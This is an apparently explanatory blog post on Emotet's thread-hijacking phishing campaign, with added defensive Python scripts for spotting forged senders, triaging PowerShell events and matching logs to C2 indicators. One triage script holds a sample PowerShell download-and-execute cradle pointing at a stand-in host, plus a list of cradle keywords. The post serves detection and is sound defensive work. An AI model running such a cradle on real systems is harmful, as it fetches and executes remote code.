A wave of phishing e-mails of previously unseen quality is currently spreading through inboxes around the world, and German-speaking accounts in particular. What makes it special: the phishing e-mail hijacks an existing conversation and embeds a fake link that leads to malware.
Many attentive users are currently discovering e-mails with fake links in their mailboxes. A known communication partner supposedly sends a link to a document containing an invoice. The visible link text shows a domain that matches the sender's domain. In the HTML behind it, however, the link points to a hijacked server running poorly maintained software, through which the malware is distributed. The malware called Emotet is believed to be responsible for these e-mails.
This attack scenario raises a number of questions that I will try to answer.
How Does Emotet Work?
In most cases the senders are forged, and the e-mails are not sent via the infrastructure of either party to the conversation but via servers elsewhere on the Internet. The forgery works by pairing the display name of a known conversation partner with an unrelated technical sender address. Depending on the e-mail client's settings, only the display name is shown and the actual e-mail address stays hidden.
The e-mail history quoted in the current campaign is a real conversation that took place in the past.
Where Did the Malware Get These Old Mails From?
At the moment it looks as if mailbox contents were copied during infections over the last six months. That earlier campaign used fake invoices from large providers such as Amazon, O2, DHL or Telekom. At first only addresses were extracted from the stolen e-mails for further distribution; now the complete e-mail histories are used to make the phishing e-mail more trustworthy. Thanks to the message IDs in the e-mail headers (In-Reply-To and References), some e-mail clients even file the new message straight into the old conversation thread. Here lies a possible weak point of the attack wave: the previous conversation may have been a fairly long time ago. Receiving an invoice or document today for a transaction from last year may strike some recipients as odd.
It has not yet been conclusively established whether the e-mails were stolen on the sender's or the recipient's side. It can currently be assumed that the malware stole both received and sent e-mails and reuses them in the right context.
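As an added example (not part of the original post), the following Python script checks an incoming message for the signs described in the two sections above: a known display name paired with an unrelated technical sender address, an HTML link whose visible text names a different host than its href, and a reply that references the Message-ID of a known old thread but comes from an address that never took part in it. The message, the contact list and the thread table are constructed for the example; only the standard library is used.

```python
"""Flag the tell-tale signs of a thread-hijacking phishing mail.

Added example, not code from the original post. The message, the contact
list and the thread table below are constructed for illustration.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the display name is a known partner at example.de, but the
# technical sender is elsewhere, and the visible link text shows the partner's
# domain while the href points to a different (hijacked) host.
SAMPLE_EML = """\
From: "Max Mustermann" <info@shop-angebote.example.net>
To: buchhaltung@example.com
Subject: AW: Rechnung Projekt 2018
In-Reply-To: <20180412.1234@mail.example.de>
References: <20180412.1234@mail.example.de>
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Hallo, anbei die Rechnung:</p>
<p><a href="http://cms.hijacked-host.example.org/wp-content/doc.php?id=7">https://www.example.de/docs/rechnung.doc</a></p>
</body></html>
"""

# Constructed: display name -> address we know for that contact.
CONTACTS = {"Max Mustermann": "m.mustermann@example.de"}
# Constructed: Message-ID of an old thread -> addresses that took part in it.
KNOWN_THREADS = {
    "<20180412.1234@mail.example.de>": {"m.mustermann@example.de", "buchhaltung@example.com"},
}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def shown_host(text):
    """Host the reader sees in the link text, if the text looks like a URL."""
    if "://" in text:
        return urlparse(text).hostname
    if text.lower().startswith("www."):
        return text.split("/")[0].lower()
    return None


def analyse(raw, contacts, known_threads):
    """Return a list of human-readable findings; an empty list means no sign found."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    sender = msg["From"].addresses[0]
    name, addr = sender.display_name, sender.addr_spec.lower()
    expected = contacts.get(name)
    if expected and expected.lower() != addr:
        findings.append(f"display name '{name}' belongs to {expected}, but the sender is {addr}")

    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = _LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            shown, real = shown_host(text), urlparse(href).hostname
            if shown and real and shown != real:
                findings.append(f"link text shows {shown} but the href goes to {real}")

    parent = str(msg["In-Reply-To"] or "").strip()
    if parent in known_threads and addr not in known_threads[parent]:
        findings.append(f"reply to thread {parent} from {addr}, which never took part in it")
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EML, CONTACTS, KNOWN_THREADS):
        print("!", finding)
```

The thread check is the one a mail client does not do for you: a client that threads by In-Reply-To will happily file the message under the old conversation, which is exactly the effect the campaign relies on.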
Why Is Emotet so Dangerous?
Emotet is a big problem for virus scanners because it uses many camouflage and self-modification techniques. It has a so-called polymorphic design, meaning it can change its own code to evade signature-based virus scanners. In addition, it detects reliably whether it is running in a virtual environment. If it believes it is running in a sandbox, it stays completely inconspicuous.
Aside from the current campaign, Emotet does not only spread via e-mail. It can also scan an internal network and tries to spread further with network sniffing and brute-force attacks. Another option is spreading via the EternalBlue vulnerability, which became known through WannaCry. Using these methods in combination, it can also spread like a worm within networks. With the brute-force attacks it can take over further internal accounts and copy further e-mails from there, which can then be misused again for the phishing campaign. The web download in the PowerShell script automatically uses the system-wide configured proxy, so an enforced proxy alone does not prevent the download.
Emotet currently uses a PowerShell script in the e-mails that works on the various Windows versions and leads to infection there. Once a system has been infected, the first steps are:
§ The malware updates itself to the current version.
§ The malware then tries to anchor itself permanently in the system.
§ In the third step, the various modules are loaded and executed. These are the actual malicious or attack components.
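The infection chain above starts with a PowerShell download cradle, and that first step is the one most visible in process-creation logs. The following Python script is an added example (not code from the original post) that triages such events: it decodes an -EncodedCommand argument (base64 of UTF-16LE), looks for download-and-execute keywords in the decoded script, and flags a hidden window and an Office parent process. The events are constructed in the shape of a parent-process / image / command-line record, and the assumption that an Office application launches the script is this example's, not a statement from the post.

```python
"""Triage process-creation events for the PowerShell download cradle that starts
the infection chain described above.

Added example, not code from the original post. The events below are constructed
in the shape of a parent-process / image / command-line record; the encoded
command is built here from a plaintext cradle so the decoding step can be shown.
"""
import base64
import re

# Keywords typical of a download-and-execute stager.
CRADLE_KEYWORDS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|Start-Process|FromBase64String)", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = "|".join("encodedcommand"[:n] for n in range(1, 15))
ENCODED_FLAG = re.compile(rf"-(?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)
# Assumption for this example: a document opened from the mail launches the script,
# so an Office application as parent of powershell.exe is treated as a strong signal.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}

PLAINTEXT_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://hijacked-host.example.org/a.php')"
ENCODED_CRADLE = base64.b64encode(PLAINTEXT_CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed events: one stager-like launch and two benign ones.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENCODED_CRADLE}"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the reasons an event looks like a stager launch (empty list if none)."""
    reasons = []
    if basename(event["image"]) != "powershell.exe":
        return reasons
    parent = basename(event["parent"])
    if parent in OFFICE_PARENTS:
        reasons.append(f"powershell.exe spawned by Office process {parent}")
    cmdline = event["cmdline"]
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden window requested")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded)
    # Search the decoded script if there was one, otherwise the raw command line.
    hits = sorted({m.group(1).lower() for m in CRADLE_KEYWORDS.finditer(decoded or cmdline)})
    if hits:
        reasons.append("download-cradle keywords: " + ", ".join(hits))
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event with at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := analyse_event(e))]


if __name__ == "__main__":
    for index, reasons in triage(EVENTS):
        print(f"event {index}:")
        for reason in reasons:
            print("  -", reason)
```

Keyword matching is deliberately applied to the decoded text rather than the raw command line: on a real event the base64 blob hides every keyword, which is the whole point of the encoding.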
In corporate networks this is the foothold for taking over not just a single PC but the entire network. The damage can be correspondingly high, because the Trojan gives the attacker full access to the company's entire network infrastructure. As early as December 2018, the BSI issued a warning about the possible damage caused by Emotet. Emotet can, for example, download banking Trojans, or simply delete or encrypt internal data. If the network infrastructure is paralysed, large-scale production downtimes can follow.
How Can I Protect Myself from Emotet?
Trying to delete the malware from the system and clean it up is not effective. Because of the modular design and the downloaded code, the AV software will presumably not recognise and delete all components. The recommendation is to rebuild an infected system completely from scratch. It must also be assumed that all passwords stored on the system, for example in the browser, are compromised and have to be changed.
Anyone who operates a SIEM or log management system should check whether they can identify connections to the command-and-control servers used by Emotet. These rotate regularly, so a hit in the logs does not by itself prove an infection: the same IP may have been used before or afterwards by a legitimate service. Check that the hit falls within the period in which the address was actually in use by Emotet.
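The following Python script is an added example (not code from the original post) of the check just described: it matches constructed proxy log lines against C2 indicators that carry a validity window, reports hits outside the window as stale instead of as infections, and treats repeated contact from one client on more than one day as the stronger signal. The indicator rows and log lines are constructed; in practice the windows come from whichever threat-intelligence source reported when Emotet used each server.

```python
"""Match outbound connections against C2 indicators that carry a validity window.

Added example, not code from the original post. The indicator rows and the
proxy log lines are constructed; in practice the windows come from the
threat-intel source that reported when Emotet used each server.
"""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed indicator feed: (ip, first_seen, last_seen), UTC.
C2_INDICATORS = [
    ("203.0.113.45", "2018-12-01T00:00:00Z", "2018-12-20T00:00:00Z"),
    ("198.51.100.7", "2019-01-10T00:00:00Z", "2019-01-31T00:00:00Z"),
]

# Constructed proxy log: timestamp client dest_ip dest_port bytes_out
PROXY_LOG = """\
2019-01-12T08:15:02Z 10.1.2.34 198.51.100.7 8080 2310
2019-01-12T08:15:41Z 10.1.2.34 198.51.100.7 8080 9871
2019-01-12T09:02:10Z 10.1.5.9 203.0.113.45 443 1200
2019-01-13T11:40:00Z 10.1.2.34 198.51.100.7 8080 450
2019-01-13T11:41:00Z 10.1.9.21 93.184.216.34 443 40210
"""


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def load_indicators(rows):
    """Map ip -> (first_seen, last_seen)."""
    return {ip: (parse_ts(first), parse_ts(last)) for ip, first, last in rows}


def match(log_text, indicators):
    """Split hits into those inside the indicator's window and stale ones.

    Returns (active, stale): active maps client -> [(ts, dest_ip, port)],
    stale is a list of (ts, client, dest_ip) for hits outside the window,
    which may well be a legitimate service on a reused address.
    """
    active, stale = defaultdict(list), []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_text, client, dest, port, _bytes = line.split()
        if dest not in indicators:
            continue
        ts = parse_ts(ts_text)
        first, last = indicators[dest]
        if first <= ts <= last:
            active[client].append((ts, dest, int(port)))
        else:
            stale.append((ts, client, dest))
    return dict(active), stale


def classify(active):
    """Repeated contact on more than one day looks like beaconing; a single hit needs a look."""
    verdicts = {}
    for client, hits in active.items():
        days = {ts.date() for ts, _, _ in hits}
        verdicts[client] = "likely infected" if len(days) > 1 else "single hit, verify"
    return verdicts


if __name__ == "__main__":
    active, stale = match(PROXY_LOG, load_indicators(C2_INDICATORS))
    for client, verdict in classify(active).items():
        print(f"{client}: {verdict} ({len(active[client])} contacts)")
    for ts, client, dest in stale:
        print(f"stale: {client} -> {dest} at {ts.isoformat()} (outside indicator window)")
```

In the constructed data the contact with 203.0.113.45 lands three weeks after that indicator's window closed, so it is reported as stale rather than counted as an infection, while 10.1.2.34 talks to 198.51.100.7 on two consecutive days inside the window.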
All in all, Emotet has been a dangerous tool in the attackers' arsenal for a while. With the current campaign using stolen e-mail histories, however, the attackers have taken phishing to a new level. Because of the stolen e-mails, this campaign creates uncertainty on your own side and puts the communication partner in a bad light. It is currently unclear on which side the e-mails were stolen. All companies involved in the communication must check their infrastructures.
In addition to checking that the antivirus software is up to date, settings in the e-mail client that display both the real URL behind links in HTML e-mails and the full sender address including the technical address are helpful. The usual recommendations to install all security updates for operating systems and applications such as browsers, e-mail clients and Office promptly also reduce the attack surface here. Network segmentation helps against spreading within your own network, for example by allowing only the SMB or RDP connections that are actually needed and thus making it harder to move on to other clients.
And against the attackers' latest tricks, an up-to-date antivirus alone is not enough; what helps is attentive users who check the real sender address and the real link target before clicking.